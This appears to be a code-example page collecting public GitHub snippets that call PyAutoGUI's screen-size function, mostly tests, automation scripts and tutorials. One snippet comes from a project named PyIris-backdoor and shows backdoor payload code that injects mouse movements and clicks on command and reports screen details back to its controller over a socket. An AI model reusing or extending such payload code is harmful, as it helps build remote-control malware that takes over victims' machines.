How to use the pyautogui.size function in PyAutoGUI

To help you get started, we’ve selected a few PyAutoGUI examples, based on popular ways it is used in public projects.

Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.

github asweigart / pyautogui / tests / test_pyautogui.py View on Github external
def test_onScreen(self):
        zero = P(0, 0)
        xone = P(1, 0)
        yone = P(0, 1)
        size = P(*pyautogui.size())
        half = size / 2

        on_screen = [zero, zero + xone, zero + yone, zero + xone + yone, half, size - xone - yone]
        off_screen = [zero - xone, zero - yone, zero - xone - yone, size - xone, size - yone, size]

        for value, coords in [(True, on_screen), (False, off_screen)]:
            for coord in coords:
                self.assertEqual(
                    value,
                    pyautogui.onScreen(*coord),
                    "onScreen({0}, {1}) should be {2}".format(coord.x, coord.y, value),
                )
                self.assertEqual(
                    value,
                    pyautogui.onScreen(list(coord)),
                    "onScreen([{0}, {1}]) should be {2}".format(coord.x, coord.y, value),
github DFO-Ocean-Navigator / Ocean-Data-Map-Project / tests / frontend_tests / ui_tests.py View on Github external
def find_temperature_bar():
    """

    Function to locate the temperature bar on
    the ocean navigator public page. 
    
    """
    time.sleep(2)
    screenWidth, screenHeight = gui.size()
    # Go to the navigator web page
    #navigator_webpage()
    # Locate temperature color bar on public page 
    image_loc = gui.locateCenterOnScreen(
        paths['test_temperature'], confidence=0.7, grayscale=True)

    if image_loc is None:
        gui.alert(text='Temperature bar not found!', title='Temperature bar', button='OK')
    else:
        gui.click(button='right', x=image_loc.x, y=image_loc.y)
        gui.alert(text='Temperature bar check complete!', title='Temperature bar', button='Close', timeout=box_timeout)
github angus-y / PyIris-backdoor / payloads / lin_injection_payload.py View on Github external
s.sendall('[+]Injected right mouse click' + End)
        elif injection_type == 'move_to':
            if not arg:
                s.sendall('[-]Supply a key as an arg'+End)
                return
            try:
                arg = arg.split(' ')
                cord_one = int(arg[0])
                cord_two = int(arg[1])
                pyautogui.moveTo(x=cord_one, y=cord_two)
                s.sendall('[+]Injected mouse movement' + End)
            except:
                s.sendall('[-]Input X and Y coordinates as integers' + End)
                return
        elif injection_type == 'dimensions':
            dimensions = pyautogui.size()
            dimensions = '[+]Dimensions of screen : ' + str(dimensions[0]) + ' x ' + str(dimensions[1])
            s.sendall(dimensions + End)
        elif injection_type == 'position':
            current = pyautogui.position()
            current = '[+]Current mouse position : ' + str(current[0]) + ' x ' + str(current[1])
            s.sendall(current + End)
        else:
            s.sendall('[-]Unknown command "' + injection_type + '", run "help" for help menu' + End)
    except Exception as e:
        s.sendall('[-]Error injecting keystrokes : ' + str(e))
github chaodengusc / Dota2_ai_bot / dota_model.py View on Github external
def __init__(self, view):
    self.view = view
    self.width, self.height = pg.size()
github eClarity / skill-autogui / __init__.py View on Github external
def handle_screen_res_intent(self, message):
        screen = pyautogui.size()
        resx = screen[0]
        resy = screen[1]
        responsex = num2words(resx)
        responsey = num2words(resy)
        self.speak("Your screen resolution is %s by %s" % (responsex, responsey))
github mozilla / iris_firefox / iris / api / core / screen.py View on Github external
import mss
import pyautogui

from region import Region

logger = logging.getLogger(__name__)


class Screen(Region):
    def __init__(self, screen_id=0):
        """Function assign value to the '_screen_id' and '_screen_list' Screen parameters."""
        self._screen_id = screen_id
        self._screen_list = [item for item in mss.mss().monitors[1:]]
        Region.__init__(self, get_screen_details(self._screen_list, self._screen_id))

    SCREEN_WIDTH, SCREEN_HEIGHT = pyautogui.size()
    screen_region = Region(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT)

    TOP_HALF = Region.screen_regions(screen_region, 'TOP_HALF')
    BOTTOM_HALF = Region.screen_regions(screen_region, 'BOTTOM_HALF')

    LEFT_HALF = Region.screen_regions(screen_region, 'LEFT_HALF')
    RIGHT_HALF = Region.screen_regions(screen_region, 'RIGHT_HALF')

    TOP_THIRD = Region.screen_regions(screen_region, 'TOP_THIRD')
    MIDDLE_THIRD_HORIZONTAL = Region.screen_regions(screen_region, 'MIDDLE_THIRD_HORIZONTAL')
    BOTTOM_THIRD = Region.screen_regions(screen_region, 'BOTTOM_THIRD')

    LEFT_THIRD = Region.screen_regions(screen_region, 'LEFT_THIRD')
    MIDDLE_THIRD_VERTICAL = Region.screen_regions(screen_region, 'MIDDLE_THIRD_VERTICAL')
    RIGHT_THIRD = Region.screen_regions(screen_region, 'RIGHT_THIRD')
github EvilPort2 / final-year-project / modules / gesture_recognition / gesture_action.py View on Github external
def gesture_action():
	with open("range.pickle", "rb") as f:
		t = pickle.load(f)
	print(t)
	hsv_lower = np.array([t[0], t[1], t[2]])						  # HSV hsv lower
	hsv_upper = np.array([t[3], t[4], t[5]])					  # HSV hsv upper
	screen_width, screen_height = gui.size()
	#camx, camy = 480, 360

	c2, c1 = 0, 0
	flag_do_gesture = 0
	flags = [False, False, False]											   # flags for number of coloured objects found (flag0, flag1, flag2)
	buff = 500
	line_pts = deque(maxlen = buff)
	line_pts1 = deque(maxlen = buff)
	line_pts2 = deque(maxlen = buff)
	created_gesture_hand = []
	created_gesture_hand_left = []
	created_gesture_hand_right = []
	count_stop_left = 0 
	count_stop_right = 0 
	count_stop = 0 
	old_center_left = [0, 0]
github vprusso / youtube_tutorials / web_scraping_and_automation / pyautogui_mouse_controller.py View on Github external
import pyautogui

# Depending on your program, pyautogui can "go rogue". As a failsafe, 
# we may move the mouse to the upper left corner of the screen to 
# halt the execution of a "rogue" program by setting the following:
pyautogui.FAILSAFE = True

# The location of the mouse cursor is provided as an (x,y) pair. 
# This value of x and y are determined by the resolution of your
# monitor. My resolution is 2720x1024. For example:
#   The top right corner of my screen is (2720, 0)
#   The bottom left corner of my screen is (0, 1024),
#   etc.

# You can obtain the coordinates of your own computer screen here:
print(pyautogui.size())

# Moving the mouse to a specifc location:
pyautogui.moveTo(100, 100, duration=0.25)

# Moving the mouse to specific locations (in a loop):
# Try running this program, but then also try moving the
# mouse up and to the left to see the result of the failsafe
# we previously enabled. 
for i in range(10):
    pyautogui.moveTo(100, 100, duration=0.25)
    pyautogui.moveTo(200, 100, duration=0.25)
    pyautogui.moveTo(200, 200, duration=0.25)
    pyautogui.moveTo(100, 200, duration=0.25)

# Move the mouse relative to a specific location:
# Run this line a couple times to see the effect.
github SouravJohar / Gesture-Recognition / SRC / Python / Gesture Recognition v1.2 / src / Gesture.Recognition.v1.2.withConsole.py View on Github external
def setup():
        f = open(r"\\VBOXSVR\Code\HandRecData.txt", "w")
        f.write("")
        screenWidth = gui.size()[0]; screenHeight = gui.size()[1] #needed for mouse control